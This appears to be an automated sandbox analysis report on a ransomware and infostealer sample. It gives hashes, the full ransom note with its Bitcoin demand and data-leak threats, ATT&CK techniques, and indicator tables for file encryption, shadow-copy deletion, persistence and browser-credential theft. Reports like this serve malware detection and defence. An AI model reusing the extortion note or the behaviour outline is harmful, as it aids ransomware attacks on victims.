8411bca3ef85f5da19c00b3181545be884dde58b0683a9d39d7d1b98747a8305

Analysis

max time kernel
131s
max time network
48s
platform
windows7_x64
resource
win7-20220414-en
submitted
04/05/2022, 19:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sample.exe
Size

1.1MB
MD5

a56644a519d6fce5f20a744ae3820af2
SHA1

93acd978da4a602c9ea1a23b6a97d74ced436e56
SHA256

563daaab9f9d7be02f037c540d561c424aa3e5efc6a9a5c8d58858d98e2aae3c
SHA512

5ee5ae6d10bb4c3290664454666bd5f82d694bb772d9d5e6dc9e29cb7129cf696ac5b694676eb78074e4196a459e66f6b34b920017af1cd2addb35a1e1b85416

Score

10^/10

evasion ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\Read_Me!_.txt

Ransom Note

All Your Files Encrypted And Sensitive Data Downloaded (Financial Documents,Contracts,Invoices etc.. ). To Get Decryption Tools You Should Buy Our Decrption Tools And Then We Will Send You Decryption Tools And Delete Your Sensitive Data From Our Servers. If Payment Is Not Made We have to Publish Your Sensitive Data If Necessary Sell Them And Send Them To Your Competitors And After A While Our Servers Will Remove Your Decrypion Keys From Servers. Your Files Encrypted With Strongest Encryption Algorithm So Without Our Decryption Tools Nobody Can't Help You So Do Not Waste Your Time In Vain! Your ID: 3sK3OK Email Address: [email protected] In Case Of Problem With First Email Send Us Mail At : [email protected] Send Your ID In Email And Check Spam Folder. This Is Just Business To Get Benefits, If Do Not Contact Us After 48 Hours Decryption Price Will x2. What Guarantee Do We Give You ? You Should Send Some Encrypted Files To Us For Decryption Test. ---------------------------------------------------------------------- Attention! Do Not Edit Or Rename Encrypted Files. Do Not Try To Decrypt Files By Third-Party Or Data Recovery Softwares It May Damage Files. In Case Of Trying To Decrypt Files With Third-Party Sofwares,This May Make The Decryption Harder So Prices Will Be Rise. ---------------------------------------------------------------------- How To Buy Bitcoin : Buy Bitcoin Instructions At LocalBitcoins : https://localbitcoins.com/guides/how-to-buy-bitcoins Buy Bitcoin Instructions At Coindesk And Get More Info By Searching At Google : https://www.coindesk.com/learn/how-can-i-buy-bitcoin/

Emails

[email protected]

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Executes dropped EXE 2 IoCs

pid	Process
384	Process not Found
844	Desktopini.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\RenameRestart.tiff	sample.exe

Deletes itself 1 IoCs

pid	Process
844	Desktopini.exe

Drops startup file 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt	sample.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe	Desktopini.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe	sample.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe	sample.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt	sample.exe

Loads dropped DLL 11 IoCs

pid	Process
1400	Process not Found
1400	Process not Found
384	Process not Found
1400	Process not Found
1400	Process not Found
1400	Process not Found
1400	Process not Found
1400	Process not Found
1400	Process not Found
1400	Process not Found
1400	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Drops desktop.ini file(s) 64 IoCs

description	ioc	Process
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini	sample.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	sample.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	sample.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini	sample.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1819626980-2277161760-1023733287-1000\desktop.ini	Desktopini.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\PWZ8QZ9F\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D396AG1W\desktop.ini	sample.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	sample.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	sample.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	sample.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	sample.exe
File opened for modification	C:\Users\Public\desktop.ini	sample.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini	sample.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Ringtones\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	sample.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	sample.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\N4DR1BTE\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	sample.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini	sample.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VRG14UW3\desktop.ini	sample.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	sample.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	sample.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	sample.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I7JGZPUA\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	sample.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	sample.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\P4R98AUH\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	sample.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	sample.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	sample.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	sample.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	sample.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\8WU7A3BP\desktop.ini	sample.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	sample.exe
File opened (read-only)	\??\G:	sample.exe
File opened (read-only)	\??\J:	sample.exe
File opened (read-only)	\??\M:	sample.exe
File opened (read-only)	\??\P:	sample.exe
File opened (read-only)	\??\Q:	sample.exe
File opened (read-only)	\??\U:	sample.exe
File opened (read-only)	\??\X:	sample.exe
File opened (read-only)	\??\E:	sample.exe
File opened (read-only)	\??\F:	sample.exe
File opened (read-only)	\??\K:	sample.exe
File opened (read-only)	\??\R:	sample.exe
File opened (read-only)	\??\S:	sample.exe
File opened (read-only)	\??\T:	sample.exe
File opened (read-only)	\??\A:	sample.exe
File opened (read-only)	\??\N:	sample.exe
File opened (read-only)	\??\V:	sample.exe
File opened (read-only)	\??\W:	sample.exe
File opened (read-only)	\??\B:	sample.exe
File opened (read-only)	\??\H:	sample.exe
File opened (read-only)	\??\I:	sample.exe
File opened (read-only)	\??\L:	sample.exe
File opened (read-only)	\??\O:	sample.exe
File opened (read-only)	\??\Y:	sample.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00095_.WMF[[email protected]].CCBG	sample.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\msaddsr.dll	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105710.WMF	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip	sample.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo[[email protected]].CCBG	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00612_.WMF	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV_K_COL.HXK	sample.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\settings.js	sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\service.js	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\HEADER.GIF[[email protected]].CCBG	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01126_.WMF	sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.CRT	sample.exe
File opened for modification	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_ButtonGraphic.png	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\CASHREG.WAV	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG[[email protected]].CCBG	sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\css\settings.css	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\MedianFax.Dotx	sample.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png	sample.exe
File created	C:\Program Files\Microsoft Games\Chess\it-IT\Read_Me!_.txt	sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\FPERSON.DLL	sample.exe
File opened for modification	C:\Program Files\Java\jre7\lib\fonts\LucidaSansRegular.ttf[[email protected]].CCBG	sample.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\Read_Me!_.txt	sample.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_down.png	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTFORM.DAT[[email protected]].CCBG	sample.exe
File opened for modification	\??\c:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui	sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\msvcr100.dll	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02794_.WMF	sample.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\css\Read_Me!_.txt	sample.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png	sample.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\FreeCell.exe	sample.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\clock.js	sample.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new_partly-cloudy.png	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Contacts.accdt[[email protected]].CCBG	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsPrintTemplate.html[[email protected]].CCBG	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue.css	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14996_.GIF[[email protected]].CCBG	sample.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\weather.css	sample.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\localizedStrings.js	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_SlateBlue.gif[[email protected]].CCBG	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSYUBIN7.DLL	sample.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter_partly-cloudy.png	sample.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar[[email protected]].CCBG	sample.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\css\Read_Me!_.txt	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_LightSpirit.gif[[email protected]].CCBG	sample.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\JOURNAL\Read_Me!_.txt	sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\VSTO\vstoee90.tlb	sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\msdasc.dll	sample.exe
File created	C:\Program Files (x86)\Google\Update\Install\Read_Me!_.txt	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00234_.WMF	sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\settings.html	sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\es-ES\mshwLatin.dll.mui	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL097.XML[[email protected]].CCBG	sample.exe
File opened for modification	\??\c:\Program Files\Windows Journal\MSPVWCTL.DLL	sample.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_rainy.png	sample.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\js\calendar.js	sample.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Excel.en-us\Read_Me!_.txt	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_F_COL.HXK[[email protected]].CCBG	sample.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\es-ES\InkObj.dll.mui	sample.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\Read_Me!_.txt	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21312_.GIF[[email protected]].CCBG	sample.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Singapore	sample.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03331_.WMF	sample.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Pagesfilo.sys	sample.exe
File opened for modification	C:\Windows\Pagesfilo.sys	sample.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1968	schtasks.exe
1756	schtasks.exe

Delays execution with timeout.exe 7 IoCs

evasion

pid	Process
1128	timeout.exe
1660	timeout.exe
608	timeout.exe
1044	timeout.exe
1068	timeout.exe
472	timeout.exe
388	timeout.exe

Enumerates processes with tasklist 1 TTPs 9 IoCs

Process Discovery

T1057

pid	Process
1144	tasklist.exe
536	tasklist.exe
1200	tasklist.exe
1964	tasklist.exe
2044	tasklist.exe
828	tasklist.exe
1332	tasklist.exe
1740	tasklist.exe
1044	tasklist.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1872	systeminfo.exe
1744	systeminfo.exe

Interacts with shadow copies 2 TTPs 3 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1636	vssadmin.exe
1432	vssadmin.exe
1964	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
396	taskkill.exe
752	taskkill.exe
544	taskkill.exe
856	taskkill.exe
1980	taskkill.exe
1636	taskkill.exe
884	taskkill.exe
856	taskkill.exe
1980	taskkill.exe
432	taskkill.exe
1944	taskkill.exe
1052	taskkill.exe
320	taskkill.exe
1388	taskkill.exe
1268	taskkill.exe
1972	taskkill.exe
1388	taskkill.exe
608	taskkill.exe
1064	taskkill.exe
608	taskkill.exe
1636	taskkill.exe
820	taskkill.exe
1276	taskkill.exe
1740	taskkill.exe
856	taskkill.exe
1956	taskkill.exe
1792	taskkill.exe
2004	taskkill.exe
884	taskkill.exe
1352	taskkill.exe
524	taskkill.exe
2004	taskkill.exe
960	taskkill.exe
1776	taskkill.exe
1124	taskkill.exe
884	taskkill.exe
2008	taskkill.exe
1176	taskkill.exe
1180	taskkill.exe
1792	taskkill.exe
1364	taskkill.exe
960	taskkill.exe
2044	taskkill.exe
1196	taskkill.exe
1900	taskkill.exe
1792	taskkill.exe
1196	taskkill.exe
1972	taskkill.exe
1636	taskkill.exe
960	taskkill.exe
1956	taskkill.exe
1268	taskkill.exe
844	taskkill.exe
980	taskkill.exe
1364	taskkill.exe
1956	taskkill.exe
1948	taskkill.exe
2044	taskkill.exe
1388	taskkill.exe
652	taskkill.exe
608	taskkill.exe
1052	taskkill.exe
1980	taskkill.exe
1488	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1992	reg.exe
764	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2044	tasklist.exe
2044	tasklist.exe
1144	tasklist.exe
1144	tasklist.exe
1740	tasklist.exe
1740	tasklist.exe
1044	tasklist.exe
1044	tasklist.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2044	tasklist.exe
Token: SeDebugPrivilege	1144	tasklist.exe
Token: SeBackupPrivilege	1096	vssvc.exe
Token: SeRestorePrivilege	1096	vssvc.exe
Token: SeAuditPrivilege	1096	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1128	WMIC.exe
Token: SeSecurityPrivilege	1128	WMIC.exe
Token: SeTakeOwnershipPrivilege	1128	WMIC.exe
Token: SeLoadDriverPrivilege	1128	WMIC.exe
Token: SeSystemProfilePrivilege	1128	WMIC.exe
Token: SeSystemtimePrivilege	1128	WMIC.exe
Token: SeProfSingleProcessPrivilege	1128	WMIC.exe
Token: SeIncBasePriorityPrivilege	1128	WMIC.exe
Token: SeCreatePagefilePrivilege	1128	WMIC.exe
Token: SeBackupPrivilege	1128	WMIC.exe
Token: SeRestorePrivilege	1128	WMIC.exe
Token: SeShutdownPrivilege	1128	WMIC.exe
Token: SeDebugPrivilege	1128	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1128	WMIC.exe
Token: SeRemoteShutdownPrivilege	1128	WMIC.exe
Token: SeUndockPrivilege	1128	WMIC.exe
Token: SeManageVolumePrivilege	1128	WMIC.exe
Token: 33	1128	WMIC.exe
Token: 34	1128	WMIC.exe
Token: 35	1128	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1128	WMIC.exe
Token: SeSecurityPrivilege	1128	WMIC.exe
Token: SeTakeOwnershipPrivilege	1128	WMIC.exe
Token: SeLoadDriverPrivilege	1128	WMIC.exe
Token: SeSystemProfilePrivilege	1128	WMIC.exe
Token: SeSystemtimePrivilege	1128	WMIC.exe
Token: SeProfSingleProcessPrivilege	1128	WMIC.exe
Token: SeIncBasePriorityPrivilege	1128	WMIC.exe
Token: SeCreatePagefilePrivilege	1128	WMIC.exe
Token: SeBackupPrivilege	1128	WMIC.exe
Token: SeRestorePrivilege	1128	WMIC.exe
Token: SeShutdownPrivilege	1128	WMIC.exe
Token: SeDebugPrivilege	1128	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1128	WMIC.exe
Token: SeRemoteShutdownPrivilege	1128	WMIC.exe
Token: SeUndockPrivilege	1128	WMIC.exe
Token: SeManageVolumePrivilege	1128	WMIC.exe
Token: 33	1128	WMIC.exe
Token: 34	1128	WMIC.exe
Token: 35	1128	WMIC.exe
Token: SeDebugPrivilege	1636	taskkill.exe
Token: SeDebugPrivilege	432	taskkill.exe
Token: SeDebugPrivilege	2044	taskkill.exe
Token: SeDebugPrivilege	884	taskkill.exe
Token: SeDebugPrivilege	1196	taskkill.exe
Token: SeDebugPrivilege	1352	taskkill.exe
Token: SeDebugPrivilege	2012	taskkill.exe
Token: SeDebugPrivilege	1972	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	1948	taskkill.exe
Token: SeDebugPrivilege	396	taskkill.exe
Token: SeDebugPrivilege	652	taskkill.exe
Token: SeDebugPrivilege	820	taskkill.exe
Token: SeDebugPrivilege	1268	taskkill.exe
Token: SeDebugPrivilege	1900	taskkill.exe
Token: SeDebugPrivilege	1052	taskkill.exe
Token: SeDebugPrivilege	388	taskkill.exe
Token: SeDebugPrivilege	844	taskkill.exe
Token: SeDebugPrivilege	1124	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1336 wrote to memory of 884	1336	sample.exe	28
PID 1336 wrote to memory of 884	1336	sample.exe	28
PID 1336 wrote to memory of 884	1336	sample.exe	28
PID 1336 wrote to memory of 884	1336	sample.exe	28
PID 884 wrote to memory of 2044	884	cmd.exe	29
PID 884 wrote to memory of 2044	884	cmd.exe	29
PID 884 wrote to memory of 2044	884	cmd.exe	29
PID 884 wrote to memory of 2044	884	cmd.exe	29
PID 884 wrote to memory of 1912	884	cmd.exe	30
PID 884 wrote to memory of 1912	884	cmd.exe	30
PID 884 wrote to memory of 1912	884	cmd.exe	30
PID 884 wrote to memory of 1912	884	cmd.exe	30
PID 1336 wrote to memory of 1812	1336	sample.exe	32
PID 1336 wrote to memory of 1812	1336	sample.exe	32
PID 1336 wrote to memory of 1812	1336	sample.exe	32
PID 1336 wrote to memory of 1812	1336	sample.exe	32
PID 1336 wrote to memory of 388	1336	sample.exe	33
PID 1336 wrote to memory of 388	1336	sample.exe	33
PID 1336 wrote to memory of 388	1336	sample.exe	33
PID 1336 wrote to memory of 388	1336	sample.exe	33
PID 388 wrote to memory of 1356	388	cmd.exe	34
PID 388 wrote to memory of 1356	388	cmd.exe	34
PID 388 wrote to memory of 1356	388	cmd.exe	34
PID 388 wrote to memory of 1356	388	cmd.exe	34
PID 1336 wrote to memory of 1700	1336	sample.exe	35
PID 1336 wrote to memory of 1700	1336	sample.exe	35
PID 1336 wrote to memory of 1700	1336	sample.exe	35
PID 1336 wrote to memory of 1700	1336	sample.exe	35
PID 1700 wrote to memory of 1756	1700	cmd.exe	36
PID 1700 wrote to memory of 1756	1700	cmd.exe	36
PID 1700 wrote to memory of 1756	1700	cmd.exe	36
PID 1700 wrote to memory of 1756	1700	cmd.exe	36
PID 1356 wrote to memory of 616	1356	WScript.exe	37
PID 1356 wrote to memory of 616	1356	WScript.exe	37
PID 1356 wrote to memory of 616	1356	WScript.exe	37
PID 1356 wrote to memory of 616	1356	WScript.exe	37
PID 1356 wrote to memory of 112	1356	WScript.exe	39
PID 1356 wrote to memory of 112	1356	WScript.exe	39
PID 1356 wrote to memory of 112	1356	WScript.exe	39
PID 1356 wrote to memory of 112	1356	WScript.exe	39
PID 112 wrote to memory of 1144	112	cmd.exe	41
PID 112 wrote to memory of 1144	112	cmd.exe	41
PID 112 wrote to memory of 1144	112	cmd.exe	41
PID 112 wrote to memory of 1144	112	cmd.exe	41
PID 112 wrote to memory of 1948	112	cmd.exe	42
PID 112 wrote to memory of 1948	112	cmd.exe	42
PID 112 wrote to memory of 1948	112	cmd.exe	42
PID 112 wrote to memory of 1948	112	cmd.exe	42
PID 1336 wrote to memory of 1712	1336	sample.exe	43
PID 1336 wrote to memory of 1712	1336	sample.exe	43
PID 1336 wrote to memory of 1712	1336	sample.exe	43
PID 1336 wrote to memory of 1712	1336	sample.exe	43
PID 112 wrote to memory of 1636	112	cmd.exe	44
PID 112 wrote to memory of 1636	112	cmd.exe	44
PID 112 wrote to memory of 1636	112	cmd.exe	44
PID 112 wrote to memory of 1636	112	cmd.exe	44
PID 1336 wrote to memory of 1332	1336	sample.exe	45
PID 1336 wrote to memory of 1332	1336	sample.exe	45
PID 1336 wrote to memory of 1332	1336	sample.exe	45
PID 1336 wrote to memory of 1332	1336	sample.exe	45
PID 1332 wrote to memory of 1872	1332	cmd.exe	47
PID 1332 wrote to memory of 1872	1332	cmd.exe	47
PID 1332 wrote to memory of 1872	1332	cmd.exe	47
PID 1332 wrote to memory of 1872	1332	cmd.exe	47

C:\Users\Admin\AppData\Local\Temp\sample.exe
